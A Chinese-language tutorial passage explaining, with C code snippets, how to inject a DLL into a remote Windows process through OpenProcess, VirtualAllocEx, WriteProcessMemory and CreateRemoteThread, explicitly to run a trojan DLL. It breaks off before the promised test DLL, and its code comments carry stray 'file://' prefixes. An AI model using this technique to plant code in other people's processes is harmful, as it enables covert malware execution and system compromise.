使用OpenProcess远程加载DLL的详细步骤

首先，我们通过OpenProcess 来打开我们试图嵌入的进程（如果远程进程不允许打开，那么嵌入就无法进行了，这往往是由于权限不足引起的，解决方法是通过种种途径提升本地进程的权限） 

　hRemoteProcess = OpenProcess( PROCESS_CREATE_THREAD | file://允许远程创建线程 
　　　　　　　　　　　　　　　　PROCESS_VM_OPERATION | file://允许远程VM操作 
　　　　　　　　　　　　　　　　PROCESS_VM_WRITE,//允许远程VM写 
　　　　　　　　　　　　　　　　FALSE, dwRemoteProcessId )  

　　由于我们后面需要写入远程进程的内存地址空间并建立远程线程，所以需要申请足够的权限（PROCESS_CREATE_THREAD、VM_OPERATION、VM_WRITE）。 

　　然后，我们可以建立LoadLibraryW函数这个线程来启动我们的DLL木马，LoadLibraryW函数是在kernel32.dll中定义的，用来加载DLL文件，它只有一个参数，就是DLL文件的绝对路径名pszLibFileName，（也就是木马DLL的全路径文件名），但是由于木马DLL是在远程进程内调用的，所以我们首先还需要将这个文件名复制到远程地址空间：（否则远程线程是无法读到这个参数的） 

　file://计算DLL路径名需要的内存空间 
　int cb = (1 + lstrlenW(pszLibFileName)) * sizeof(WCHAR); 
　file://使用VirtualAllocEx函数在远程进程的内存地址空间分配DLL文件名缓冲区 
　pszLibFileRemote = (PWSTR) VirtualAllocEx( hRemoteProcess, NULL, cb, 
　　　　　　　　　　　　MEM_COMMIT, PAGE_READWRITE); 
　file://使用WriteProcessMemory函数将DLL的路径名复制到远程进程的内存空间 
　iReturnCode = WriteProcessMemory(hRemoteProcess, 
　　　　　　　　　　　　pszLibFileRemote, (PVOID) pszLibFileName, cb, NULL); 
　file://计算LoadLibraryW的入口地址 
　PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE) 
　　　　　GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW");  

　　万事俱备，我们通过建立远程线程时的地址pfnStartAddr（实际上就是LoadLibraryW的入口地址）和传递的参数pszLibFileRemote（实际上是我们复制过去的木马DLL的全路径文件名）在远程进程内启动我们的木马DLL： 

　file://启动远程线程LoadLibraryW，通过远程线程调用用户的DLL文件 
　hRemoteThread = CreateRemoteThread( hRemoteProcess, NULL, 0, 
　　　　　　　　　　　　　　　　　pfnStartAddr, pszLibFileRemote, 0, NULL);  

　　至此，远程嵌入顺利完成，为了试验我们的DLL是不是已经正常的在远程线程运行，我编写了以下的测试DLL：